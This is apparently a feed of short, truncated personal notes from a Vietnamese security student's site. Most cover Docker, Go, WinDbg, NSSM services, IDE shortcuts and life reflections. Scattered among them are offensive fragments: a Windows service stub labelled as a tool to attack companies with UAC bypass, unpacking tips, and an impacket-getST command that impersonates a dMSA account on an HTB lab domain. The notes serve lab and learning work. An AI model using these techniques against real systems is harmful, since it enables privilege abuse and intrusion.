Spycio.Kon

 Thuong thi minh khong ghi nhung minh thich Bindshell hon, ket hop powershell but not use powershell

# Dockerfile hoàn chỉnh cho Python 3.10.11 + pip + pycdc + curl FROM ubuntu:22.04 ENV DEBIAN_FRONTEND=noninteractive USER root # Cài các gói hệ thống cần thiết (curl, build tools, libs cho Python) RUN apt-get update && apt-get install -y \     wget \     curl \     build-essential \     libssl-dev \     zlib1g-dev \     libncurses5-dev \     libncursesw5-dev \     libreadline-dev \     libsqlite3-dev \     libgdbm-dev \     libdb5.3-dev \     libbz2-dev \     libexpat1-dev \     liblzma-dev \     tk-dev \     libffi-dev \     git \     cmake \     g++ \     && rm -rf /var/lib/apt/lists/* # Tải và cài Python 3.10.11 từ mã nguồn WORKDIR /tmp RUN wget https://www.python.org/ftp/python/3.10.11/Python-3.10.11.tgz \     && tar -xzf Python-3.10.11.tgz \   ...

 Code go từ cơ bản đến nâng cao code hello world cơ bản package main import "fmt" func main(){ fmt.Println("Hello world") } ================= Khai báo biến package main import "fmt" func main(){ var name string name = "hacked by kon"     fmt.Println(name) }

 reconstruct function  fastcall

 Tình buồn mai chắc buồn chưa Nỗi đau quá khứ, bây giờ đáng yêu

 Tat hoan toan may tinh tranh tran ram, cham may Shift + shutdown Shutdown binh thuong chi tat phan co cua may tinh 

  Chạy het popad roi dung scylla dump

wmain-> StartServicecCtrlDispatcher ->  ------------ sc queryex <name>  taskkill /PID <pid> /F ==== Tool dùng để tấn công các công ty eco :DD Bypass UAC và đăng kí service thôi :3 #define _CRT_SECURE_NO_WARNINGS #include "Windows.h" #include "stdio.h" #include "log.h" #define SERVICE_NAME L"Meo" SERVICE_STATUS svstatus; SERVICE_STATUS_HANDLE svstatus_handle; void WINAPI HandleFunction(DWORD Control) { switch (Control) { case 2: svstatus.dwCurrentState = SERVICE_STOPPED; SetServiceStatus(svstatus_handle, &svstatus); } } void WINAPI ServiceMain(DWORD dwNumServicesArgs, LPWSTR* lpServiceArgVectors) { svstatus_handle = RegisterServiceCtrlHandlerW(SERVICE_NAME, HandleFunction); // luồng logic chính //** start svstatus.dwCurrentState = SERVICE_RUNNING; svstatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS; svstatus.dwControlsAccepted = SERVICE_ACCEPT_STOP; SetServiceStatus(svstatus_handle, &svstatus); ...

 cai windebug attacker vo kernel thi chu y  chu y secure boot tat chua, neu chua vo thi de disable bcdedit /debug on bcdedit /dbgsettings serial debugport:1 baudrate:115200 msconfig nen nho, chi attach khi boot -> nen chay windbg truoc khi khoi dong vmware ========================== !process 0 0: Liệt kê các process đang chạy bp nt!NtWriteFile: dat breakpoint tai NtWriteFile trong nt.dll bl: list breakpoint bc 1: xoa breakpoint 1 g: go(continue) k: call stack !process 0 0 notepad.exe bp /p ffff920bda2890c0 nt!NtWriteFile: đặt breakpoint tại hàm NtWriteFile được dùng bởi nt.dll trong địa chỉ fff... !handle @rcx

 #include <windows.h> #include <stdio.h> #include <tlhelp32.h> int main() {     PROCESSENTRY32W pe;     pe.dwSize = sizeof(PROCESSENTRY32W);     HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);     if (hSnapshot == INVALID_HANDLE_VALUE)     {         printf("Cant get snapshot\n");         return 1;     }     if (!Process32FirstW(hSnapshot, &pe))     {         printf("Process32First failed: %lu\n", GetLastError());         CloseHandle(hSnapshot);         return 1;     }     do     {         wprintf(L"%ls\n", pe.szExeFile);     } while (Process32NextW(hSnapshot, &pe));     CloseHandle(hSnapshot);     return 0; }

 Bảng nhanh (hay dùng trong WinAPI) WinAPI type C type printf DWORD unsigned long %lu WORD unsigned short %hu BYTE unsigned char %u BOOL int %d HANDLE pointer %p LPVOID pointer %p

Tao service bang nssm, next run build khi set gi thi nho tao cai do, nho them quyen cho thu muc nho chu y ObjectName de set quyen cho user ==== viết lại chi tiết cách làm OK 👍, anh muốn viết lại chi tiết – từ đầu đến cuối – làm đúng 1 lần là chạy vĩnh viễn khi boot , thì em viết chuẩn checklist , không sót bước nào. Làm theo đúng thứ tự , đừng nhảy cóc.  MỤC TIÊU CUỐI Windows Server boot lên KHÔNG cần login Service tự chạy Web Next.js lên cổng 3000 Export VM -> máy khác import ->  vẫn chạy Thành phần Vị trí Node.js C:\Program Files\nodejs\ App Next.js C:\myapp NSSM C:\nssm\nssm.exe Service user thynb (user thường) Start type AUTO + DELAYED 1️⃣ CÀI NODE.JS (SYSTEM-WIDE) BẮT BUỘC : cài cho All Users Check: where node Phải ra: C:\Program Files\nodejs\node.exe 2️⃣ ĐẶT SOURCE CODE NEXT.JS mkdir C:\myapp Copy toàn bộ source vào C:\myapp Build production: cd C:\myapp npm install npm run build Test chạy tay: node node_modules\next\dist\...

 No track my fingerprinter https://myactivity.google.com/search-personalization

  1) Open the Group Policy editor using gpmc.msc 2) Select your domain and expand Group Policy Objects then right click on "Default Domain Controller Policy" and Click Edit 3) Under Computer Management, expand Policies and then select Windows Settings 4) Expand Security Settings and Select Local Policies and then click on User Rights Management 5) Right click on Deny log on locally and click on Properties 6) In the next screen you can remove the User of Group that you want

  sudo vmware-toolbox-cmd timesync disable ------------- cd "C:\Program Files\VMware\VMware Tools" vmtoolsd.exe timesync disable proxychains impacket-getST 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA   $$' -debug TZ=UTC faketime '2026-01-14 10:45:09' proxychains impacket-getST 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'

Double shilf: Tìm nhanh mọi tứ trong project lớn = Ctrl + N Ctrl + B: Theo doi nguon goc bien - trace luong truoc Alt + F7: Tìm nơi sử dụng biến Ctrl + Shilf + F: tìm kiếm text toàn project Shilf + F10: Run Shilf + F9: Debug F9: chạy đến breakpoint kế tiếp F8: Step over F7: Step into Shift + F8: thoát khỏi method hiện tại Ctrl + ALT + L: format code Ctrl + F12: hiển thị các methods

 Năm 2025 là một năm chán vô cùng chán với mình Mình đi được nhiều nơi, được tham gia diễn tập nhiều thứ :D Noel nè <(") Tự tổ chức CTF đợt noel vừa rồi. -__-. Ổn áp với nghiên cứu khoa học - một ông anh gánh cực lực team, một bạn nữ xinh xắn giỏi cực, một giảng viên hướng dẫn tâm huyết và mình là thk ngu nhất trong tổ đội đó Hoàn thành thực tập tốt nghiệp trước hạn tận 1 năm :v Mình lười quá nên làm cho sớm để giờ tập trung công việc và đồ án. Dẫn bố đi ăn chơi lung tung và bị lạc đường <(") Cái lớp này cutie  Được 1 ông anh mời colab :))) mấy đợt colab này học được nhiều thứ phết, rất đáng giá, em cảm ơn anh  Mua được cả đống sách với giá hời, mất tầm hơn 1 triệu nhưng nhìn tủ sách mình mà thèm <(") Được kouhai tặng quà sinh nhật - vui phết, cũng nên cảm ơn 1 tiếng :3 Rấc là cutie Tập add lại mấy đứa cũ -__-, Có con nhóc kia làm mình bất ngờ thật <(") cũng có thể coi là 1 trong những độc giả đời đầu của mình. Méo hiểu tại sao hồi xưa u lại thích a đc t...

sudo apt update sudo apt install -y ca-certificates curl sudo install -m 0755 -d /etc/apt/keyrings sudo curl -fsSL https://download.docker.com/linux/debian/gpg -o /etc/apt/keyrings/docker.asc sudo chmod a+r /etc/apt/keyrings/docker.asc # Thêm repo cho Debian bookworm (không phải kali-rolling) echo "deb [arch= $( dpkg --print-architecture ) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/debian bookworm stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null sudo apt update sudo apt install -y docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin  Djtme lỗi quá sudo apt remove -y docker docker.io docker-doc docker-compose docker-compose-plugin docker-buildx docker-buildx-plugin podman-docker containerd runc sudo apt autoremove -y sudo rm -f /usr/libexec/docker/cli-plugins/docker-buildx sudo apt update sudo apt install docker-ce docker-ce-cli containerd.io docker-buildx-plugin do...

Giả sử một tình huống bạn tình cờ biết rằng có một đợt đăng kí cực kì ưu đãi và chỉ có một slot duy nhất, nếu đăng kí bạn sẽ có một khoản tiền tương đối lớn khoảng 10 tỷ, nếu chậm trễ bạn sẽ chẳng có gì. Tuy nhiên nó yêu cầu bạn cung cấp số điện thoại và chứng minh nhân dân kèm một số thông tin cá nhân riêng tư khác. Bạn không muốn để lộ thông tin cá nhân vì bạn biết điều này sẽ ảnh hưởng về sau của bạn, nên bạn đề nghị một người bạn đi cùng đăng kí hộ và cùng ăn chia tiền thưởng. Ban đầu người bạn đồng ý chia 50:50 nhưng sau khi nghe tin con số lên tới 10 tỷ người bạn muốn họ ăn 80 còn bạn chỉ 20. Lúc này bạn sẽ phản ứng thế nào. Nhìn chung cách mọi người sẽ phản ứng gay gắt với người bạn kia và nghĩ họ tham lam rồi tự mình lấy luôn 10 tỷ. Nhưng nếu cùng nhìn 1 góc độ khác, 2 tỷ cũng không phải là một khoản tiền nhỏ, người bạn kia cũng đánh đổi giá trị là thông tin của họ, còn bạn, bạn chẳng hề mất gì cả nhưng vẫn có 2 tỷ và cả sự biết ơn của người kia. Con người thường kì vọng quá ca...